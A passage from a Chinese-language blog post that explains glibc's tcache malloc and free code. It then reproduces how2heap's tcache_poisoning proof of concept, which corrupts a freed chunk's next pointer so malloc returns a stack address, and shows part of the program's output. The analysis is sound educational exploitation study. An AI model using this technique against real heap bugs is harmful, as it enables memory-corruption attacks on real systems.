class="language-C" data-lang="C"><span class="kt">void</span> <span class="o">*</span> <span class="nf">__libc_malloc</span> <span class="p">(</span><span class="n">size_t</span> <span class="n">bytes</span><span class="p">)</span> <span class="p">{</span> <span class="p">......</span> <span class="p">......</span> <span class="cp">#if USE_TCACHE </span><span class="cp"></span> <span class="cm">/* int_free also calls request2size, be careful to not pad twice. */</span> <span class="n">size_t</span> <span class="n">tbytes</span><span class="p">;</span> <span class="c1">// 根据 malloc 传入的参数计算 chunk 实际大小，并计算 tcache 对应的下标 </span><span class="c1"></span> <span class="n">checked_request2size</span> <span class="p">(</span><span class="n">bytes</span><span class="p">,</span> <span class="n">tbytes</span><span class="p">);</span> <span class="n">size_t</span> <span class="n">tc_idx</span> <span class="o">=</span> <span class="n">csize2tidx</span> <span class="p">(</span><span class="n">tbytes</span><span class="p">);</span> <span class="c1">// 初始化 tcache </span><span class="c1"></span> <span class="n">MAYBE_INIT_TCACHE</span> <span class="p">();</span> <span class="n">DIAG_PUSH_NEEDS_COMMENT</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="n">tc_idx</span> <span class="o">&lt;</span> <span class="n">mp_</span><span class="p">.</span><span class="n">tcache_bins</span> <span class="c1">// 根据 size 得到的 idx 在合法的范围内 </span><span class="c1"></span> <span class="cm">/*&amp;&amp; tc_idx &lt; TCACHE_MAX_BINS*/</span> <span class="cm">/* to appease gcc */</span> <span class="o">&amp;&amp;</span> <span class="n">tcache</span> <span class="o">&amp;&amp;</span> <span class="n">tcache</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">]</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="c1">// tcache-&gt;entries[tc_idx] 有 chunk </span><span class="c1"></span> <span class="p">{</span> <span class="k">return</span> <span class="n">tcache_get</span> <span class="p">(</span><span class="n">tc_idx</span><span class="p">);</span> <span class="p">}</span> <span class="n">DIAG_POP_NEEDS_COMMENT</span><span class="p">;</span> <span class="cp">#endif </span><span class="cp"></span> <span class="p">......</span> <span class="p">......</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><h4 id="__tcache_init">__tcache_init()</h4> <p>其中 <code>MAYBE_INIT_TCACHE ()</code> 在 tcache 为空（即第一次 malloc）时调用了 <code>tcache_init()</code>，直接查看 <code>tcache_init()</code></p> <p><a href="https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#tcache_init">source code</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="n">tcache_init</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span> <span class="n">mstate</span> <span class="n">ar_ptr</span><span class="p">;</span> <span class="kt">void</span> <span class="o">*</span><span class="n">victim</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="k">const</span> <span class="n">size_t</span> <span class="n">bytes</span> <span class="o">=</span> <span class="k">sizeof</span> <span class="p">(</span><span class="n">tcache_perthread_struct</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">tcache_shutting_down</span><span class="p">)</span> <span class="k">return</span><span class="p">;</span> <span class="n">arena_get</span> <span class="p">(</span><span class="n">ar_ptr</span><span class="p">,</span> <span class="n">bytes</span><span class="p">);</span> <span class="c1">// 找到可用的 arena </span><span class="c1"></span> <span class="n">victim</span> <span class="o">=</span> <span class="n">_int_malloc</span> <span class="p">(</span><span class="n">ar_ptr</span><span class="p">,</span> <span class="n">bytes</span><span class="p">);</span> <span class="c1">// 申请一个 sizeof(tcache_prethread_struct) 大小的 chunk </span><span class="c1"></span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">victim</span> <span class="o">&amp;&amp;</span> <span class="n">ar_ptr</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span> <span class="n">ar_ptr</span> <span class="o">=</span> <span class="n">arena_get_retry</span> <span class="p">(</span><span class="n">ar_ptr</span><span class="p">,</span> <span class="n">bytes</span><span class="p">);</span> <span class="n">victim</span> <span class="o">=</span> <span class="n">_int_malloc</span> <span class="p">(</span><span class="n">ar_ptr</span><span class="p">,</span> <span class="n">bytes</span><span class="p">);</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span><span class="n">ar_ptr</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="n">__libc_lock_unlock</span> <span class="p">(</span><span class="n">ar_ptr</span><span class="o">-&gt;</span><span class="n">mutex</span><span class="p">);</span> <span class="cm">/* In a low memory situation, we may not be able to allocate memory </span><span class="cm"> - in which case, we just keep trying later. However, we </span><span class="cm"> typically do this very early, so either there is sufficient </span><span class="cm"> memory, or there isn&#39;t enough memory to do non-trivial </span><span class="cm"> allocations anyway. */</span> <span class="k">if</span> <span class="p">(</span><span class="n">victim</span><span class="p">)</span> <span class="p">{</span> <span class="n">tcache</span> <span class="o">=</span> <span class="p">(</span><span class="n">tcache_perthread_struct</span> <span class="o">*</span><span class="p">)</span> <span class="n">victim</span><span class="p">;</span> <span class="c1">// 更新 tcache </span><span class="c1"></span> <span class="n">memset</span> <span class="p">(</span><span class="n">tcache</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span> <span class="p">(</span><span class="n">tcache_perthread_struct</span><span class="p">));</span> <span class="p">}</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p><code>tcache_init()</code> 成功返回后，<code>tcache_prethread_struct</code> 就被成功建立了</p> <h4 id="申请内存">申请内存</h4> <p>接下来将进入申请内存的步骤</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="c1">// 从 tcache list 中获取内存 </span><span class="c1"></span> <span class="k">if</span> <span class="p">(</span><span class="n">tc_idx</span> <span class="o">&lt;</span> <span class="n">mp_</span><span class="p">.</span><span class="n">tcache_bins</span> <span class="c1">// 由 size 计算的 idx 在合法范围内 </span><span class="c1"></span> <span class="cm">/*&amp;&amp; tc_idx &lt; TCACHE_MAX_BINS*/</span> <span class="cm">/* to appease gcc */</span> <span class="o">&amp;&amp;</span> <span class="n">tcache</span> <span class="o">&amp;&amp;</span> <span class="n">tcache</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">]</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="c1">// 该条 tcache 链不为空 </span><span class="c1"></span> <span class="p">{</span> <span class="k">return</span> <span class="n">tcache_get</span> <span class="p">(</span><span class="n">tc_idx</span><span class="p">);</span> <span class="p">}</span> <span class="n">DIAG_POP_NEEDS_COMMENT</span><span class="p">;</span> <span class="cp">#endif </span><span class="cp"></span> <span class="c1">// 进入与无 tcache 时类似的流程 </span><span class="c1"></span> <span class="k">if</span> <span class="p">(</span><span class="n">SINGLE_THREAD_P</span><span class="p">)</span> <span class="p">{</span> <span class="n">victim</span> <span class="o">=</span> <span class="n">_int_malloc</span> <span class="p">(</span><span class="o">&amp;</span><span class="n">main_arena</span><span class="p">,</span> <span class="n">bytes</span><span class="p">);</span> <span class="n">assert</span> <span class="p">(</span><span class="o">!</span><span class="n">victim</span> <span class="o">||</span> <span class="n">chunk_is_mmapped</span> <span class="p">(</span><span class="n">mem2chunk</span> <span class="p">(</span><span class="n">victim</span><span class="p">))</span> <span class="o">||</span> <span class="o">&amp;</span><span class="n">main_arena</span> <span class="o">==</span> <span class="n">arena_for_chunk</span> <span class="p">(</span><span class="n">mem2chunk</span> <span class="p">(</span><span class="n">victim</span><span class="p">)));</span> <span class="k">return</span> <span class="n">victim</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>在 <code>tcache-&gt;entries</code> 不为空时，将进入 <code>tcache_get()</code> 的流程获取 chunk，否则与 tcache 机制前的流程类似，这里主要分析第一种 <code>tcache_get()</code>。这里也可以看出 tcache 的优先级很高，比 fastbin 还要高（ fastbin 的申请在没进入 tcache 的流程中）。</p> <h4 id="tcache_get">tcache_get()</h4> <p>看一下 <code>tcache_get()</code></p> <p><a href="https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#tcache_get">source code</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="cm">/* Caller must ensure that we know tc_idx is valid and there&#39;s </span><span class="cm"> available chunks to remove. */</span> <span class="k">static</span> <span class="n">__always_inline</span> <span class="kt">void</span> <span class="o">*</span> <span class="nf">tcache_get</span> <span class="p">(</span><span class="n">size_t</span> <span class="n">tc_idx</span><span class="p">)</span> <span class="p">{</span> <span class="n">tcache_entry</span> <span class="o">*</span><span class="n">e</span> <span class="o">=</span> <span class="n">tcache</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">];</span> <span class="n">assert</span> <span class="p">(</span><span class="n">tc_idx</span> <span class="o">&lt;</span> <span class="n">TCACHE_MAX_BINS</span><span class="p">);</span> <span class="n">assert</span> <span class="p">(</span><span class="n">tcache</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">]</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">);</span> <span class="n">tcache</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">]</span> <span class="o">=</span> <span class="n">e</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span> <span class="o">--</span><span class="p">(</span><span class="n">tcache</span><span class="o">-&gt;</span><span class="n">counts</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">]);</span> <span class="c1">// 获得一个 chunk，counts 减一 </span><span class="c1"></span> <span class="k">return</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="n">e</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p><code>tcache_get()</code> 就是获得 chunk 的过程了。可以看出这个过程还是很简单的，从 <code>tcache-&gt;entries[tc_idx]</code> 中获得第一个 chunk，<code>tcache-&gt;counts</code> 减一，几乎没有任何保护。</p> <h4 id="__libc_free">__libc_free()</h4> <p>看完申请，再看看有 tcache 时的释放</p> <p><a href="https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#3068">source code</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="nf">__libc_free</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">mem</span><span class="p">)</span> <span class="p">{</span> <span class="p">......</span> <span class="p">......</span> <span class="n">MAYBE_INIT_TCACHE</span> <span class="p">();</span> <span class="n">ar_ptr</span> <span class="o">=</span> <span class="n">arena_for_chunk</span> <span class="p">(</span><span class="n">p</span><span class="p">);</span> <span class="n">_int_free</span> <span class="p">(</span><span class="n">ar_ptr</span><span class="p">,</span> <span class="n">p</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p><code>__libc_free()</code> 没有太多变化，<code>MAYBE_INIT_TCACHE ()</code> 在 tcache 不为空失去了作用。</p> <h4 id="_int_free">_int_free()</h4> <p>跟进 <code>_int_free()</code></p> <p><a href="https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#4123">source code</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="k">static</span> <span class="kt">void</span> <span class="nf">_int_free</span> <span class="p">(</span><span class="n">mstate</span> <span class="n">av</span><span class="p">,</span> <span class="n">mchunkptr</span> <span class="n">p</span><span class="p">,</span> <span class="kt">int</span> <span class="n">have_lock</span><span class="p">)</span> <span class="p">{</span> <span class="p">......</span> <span class="p">......</span> <span class="cp">#if USE_TCACHE </span><span class="cp"></span> <span class="p">{</span> <span class="n">size_t</span> <span class="n">tc_idx</span> <span class="o">=</span> <span class="n">csize2tidx</span> <span class="p">(</span><span class="n">size</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">tcache</span> <span class="o">&amp;&amp;</span> <span class="n">tc_idx</span> <span class="o">&lt;</span> <span class="n">mp_</span><span class="p">.</span><span class="n">tcache_bins</span> <span class="c1">// 64 </span><span class="c1"></span> <span class="o">&amp;&amp;</span> <span class="n">tcache</span><span class="o">-&gt;</span><span class="n">counts</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">]</span> <span class="o">&lt;</span> <span class="n">mp_</span><span class="p">.</span><span class="n">tcache_count</span><span class="p">)</span> <span class="c1">// 7 </span><span class="c1"></span> <span class="p">{</span> <span class="n">tcache_put</span> <span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">tc_idx</span><span class="p">);</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="cp">#endif </span><span class="cp"></span> <span class="p">......</span> <span class="p">......</span> </code></pre></td></tr></table> </div> </div><p>判断 <code>tc_idx</code> 合法，<code>tcache-&gt;counts[tc_idx]</code> 在 7 个以内时，就进入 <code>tcache_put()</code>，传递的两个参数是要释放的 chunk 和该 chunk 对应的 size 在 tcache 中的下标。</p> <h4 id="tcache_put">tcache_put()</h4> <p><a href="https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#2907">source code</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="cm">/* Caller must ensure that we know tc_idx is valid and there&#39;s room </span><span class="cm"> for more chunks. */</span> <span class="k">static</span> <span class="n">__always_inline</span> <span class="kt">void</span> <span class="nf">tcache_put</span> <span class="p">(</span><span class="n">mchunkptr</span> <span class="n">chunk</span><span class="p">,</span> <span class="n">size_t</span> <span class="n">tc_idx</span><span class="p">)</span> <span class="p">{</span> <span class="n">tcache_entry</span> <span class="o">*</span><span class="n">e</span> <span class="o">=</span> <span class="p">(</span><span class="n">tcache_entry</span> <span class="o">*</span><span class="p">)</span> <span class="n">chunk2mem</span> <span class="p">(</span><span class="n">chunk</span><span class="p">);</span> <span class="n">assert</span> <span class="p">(</span><span class="n">tc_idx</span> <span class="o">&lt;</span> <span class="n">TCACHE_MAX_BINS</span><span class="p">);</span> <span class="n">e</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="n">tcache</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">];</span> <span class="n">tcache</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">]</span> <span class="o">=</span> <span class="n">e</span><span class="p">;</span> <span class="o">++</span><span class="p">(</span><span class="n">tcache</span><span class="o">-&gt;</span><span class="n">counts</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">]);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p><code>tcache_puts()</code> 完成了把释放的 chunk 插入到 <code>tcache-&gt;entries[tc_idx]</code> 链表头部的操作，也几乎没有任何保护。并且 <strong>没有把 p 位置零</strong>。</p> <h2 id="tcache-makes-heap-exploitation-easy-again">tcache makes heap exploitation easy again</h2> <p>再复习一遍 <code>tcache_get()</code> 的源码</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="k">static</span> <span class="n">__always_inline</span> <span class="kt">void</span> <span class="o">*</span> <span class="nf">tcache_get</span> <span class="p">(</span><span class="n">size_t</span> <span class="n">tc_idx</span><span class="p">)</span> <span class="p">{</span> <span class="n">tcache_entry</span> <span class="o">*</span><span class="n">e</span> <span class="o">=</span> <span class="n">tcache</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">];</span> <span class="n">assert</span> <span class="p">(</span><span class="n">tc_idx</span> <span class="o">&lt;</span> <span class="n">TCACHE_MAX_BINS</span><span class="p">);</span> <span class="n">assert</span> <span class="p">(</span><span class="n">tcache</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">]</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">);</span> <span class="n">tcache</span><span class="o">-&gt;</span><span class="n">entries</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">]</span> <span class="o">=</span> <span class="n">e</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">;</span> <span class="o">--</span><span class="p">(</span><span class="n">tcache</span><span class="o">-&gt;</span><span class="n">counts</span><span class="p">[</span><span class="n">tc_idx</span><span class="p">]);</span> <span class="k">return</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="n">e</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>可以发现 <code>tcache_get()</code> 获取 chunk 的安全检查非常少（对 <code>tc_idx</code> 的检测可以忽略），可以说几乎没有任何检查，因此各种利用方式在有 tcache 时利用步骤也大大简化了。</p> <h3 id="tcache-poisoning">tcache poisoning</h3> <p>通过覆盖 tcache 中的 next，不需要伪造任何 chunk 结构即可实现 malloc 到任何地址。</p> <p>以 how2heap 中的 <a href="https://github.com/shellphish/how2heap/blob/master/glibc_2.26/tcache_poisoning.c">tcache_poisoning</a> 为例</p> <p>看一下源码</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="n">glibc_2</span><span class="mf">.26</span> <span class="p">[</span><span class="n">master</span><span class="err">●</span><span class="p">]</span> <span class="n">bat</span> <span class="n">tcache_poisoning</span><span class="p">.</span><span class="n">c</span> <span class="err">───────┬─────────────────────────────────────────────────────────────────────────────────</span> <span class="err">│</span> <span class="nl">File</span><span class="p">:</span> <span class="n">tcache_poisoning</span><span class="p">.</span><span class="n">c</span> <span class="err">───────┼─────────────────────────────────────────────────────────────────────────────────</span> <span class="mi">1</span> <span class="err">│</span> <span class="err">#</span><span class="n">include</span> <span class="o">&lt;</span><span class="n">stdio</span><span class="p">.</span><span class="n">h</span><span class="o">&gt;</span> <span class="mi">2</span> <span class="err">│</span> <span class="err">#</span><span class="n">include</span> <span class="o">&lt;</span><span class="n">stdlib</span><span class="p">.</span><span class="n">h</span><span class="o">&gt;</span> <span class="mi">3</span> <span class="err">│</span> <span class="err">#</span><span class="n">include</span> <span class="o">&lt;</span><span class="n">stdint</span><span class="p">.</span><span class="n">h</span><span class="o">&gt;</span> <span class="mi">4</span> <span class="err">│</span> <span class="mi">5</span> <span class="err">│</span> <span class="kt">int</span> <span class="n">main</span><span class="p">()</span> <span class="mi">6</span> <span class="err">│</span> <span class="p">{</span> <span class="mi">7</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;This file demonstrates a simple tcache poisoning attack</span> <span class="err">│</span> <span class="n">by</span> <span class="n">tricking</span> <span class="n">malloc</span> <span class="n">into</span><span class="err">\</span><span class="n">n</span><span class="s">&#34;</span> <span class="mi">8</span> <span class="err">│</span> <span class="s">&#34;returning a pointer to an arbitrary location (in this case, the </span> <span class="err">│</span> <span class="n">stack</span><span class="p">).</span><span class="err">\</span><span class="n">n</span><span class="s">&#34;</span> <span class="mi">9</span> <span class="err">│</span> <span class="s">&#34;The attack is very similar to fastbin corruption attack.</span><span class="se">\n\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="mi">10</span> <span class="err">│</span> <span class="mi">11</span> <span class="err">│</span> <span class="n">size_t</span> <span class="n">stack_var</span><span class="p">;</span> <span class="mi">12</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;The address we want malloc() to return is %p.</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="p">(</span><span class="kt">char</span> <span class="err">│</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">stack_var</span><span class="p">);</span> <span class="mi">13</span> <span class="err">│</span> <span class="mi">14</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;Allocating 1 buffer.</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="mi">15</span> <span class="err">│</span> <span class="n">intptr_t</span> <span class="o">*</span><span class="n">a</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">);</span> <span class="mi">16</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;malloc(128): %p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">a</span><span class="p">);</span> <span class="mi">17</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;Freeing the buffer...</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="mi">18</span> <span class="err">│</span> <span class="n">free</span><span class="p">(</span><span class="n">a</span><span class="p">);</span> <span class="mi">19</span> <span class="err">│</span> <span class="mi">20</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;Now the tcache list has [ %p ].</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">a</span><span class="p">);</span> <span class="mi">21</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;We overwrite the first %lu bytes (fd/next pointer) of t</span> <span class="err">│</span> <span class="n">he</span> <span class="n">data</span> <span class="n">at</span> <span class="o">%</span><span class="n">p</span><span class="err">\</span><span class="n">n</span><span class="s">&#34;</span> <span class="mi">22</span> <span class="err">│</span> <span class="s">&#34;to point to the location to control (%p).</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">intptr_t</span><span class="p">),</span> <span class="err">│</span> <span class="n">a</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stack_var</span><span class="p">);</span> <span class="mi">23</span> <span class="err">│</span> <span class="n">a</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">intptr_t</span><span class="p">)</span><span class="o">&amp;</span><span class="n">stack_var</span><span class="p">;</span> <span class="mi">24</span> <span class="err">│</span> <span class="mi">25</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;1st malloc(128): %p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">));</span> <span class="mi">26</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;Now the tcache list has [ %p ].</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stack_var</span><span class="p">);</span> <span class="mi">27</span> <span class="err">│</span> <span class="mi">28</span> <span class="err">│</span> <span class="n">intptr_t</span> <span class="o">*</span><span class="n">b</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">128</span><span class="p">);</span> <span class="mi">29</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;2st malloc(128): %p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">b</span><span class="p">);</span> <span class="mi">30</span> <span class="err">│</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">&#34;We got the control</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="mi">31</span> <span class="err">│</span> <span class="mi">32</span> <span class="err">│</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="mi">33</span> <span class="err">│</span> <span class="p">}</span> <span class="err">───────┴─────────────────────────────────────────────────────────────────────────────────</span> </code></pre></td></tr></table> </div> </div><p>运行结果是</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">glibc_2.26 <span class="o">[</span>master●<span class="o">]</span> ./tcache_poisoning This file demonstrates a simple tcache poisoning attack by tricking malloc into returning a pointer to an arbitrary location <span class="o">(</span>in this <span class="k">case</span>, the stack<span class="o">)</span>. The attack is very similar to fastbin corruption attack. The address we want malloc<span class="o">()</span> to <span class="k">return</span> is 0x7fff0d28a0c8. Allocating <span class="m">1</span> buffer. malloc<span class="o">(</span>128<span class="o">)</span>: 0x55f666ee1260 Freeing the buffer... Now the tcache list has <span class="o">[</span> 0x55f666ee1260 <span class="o">]</span>. We overwrite the first <span class="m">8</span> bytes <span class="o">(</span>fd/next pointer<span class="o">)</span> of the data at 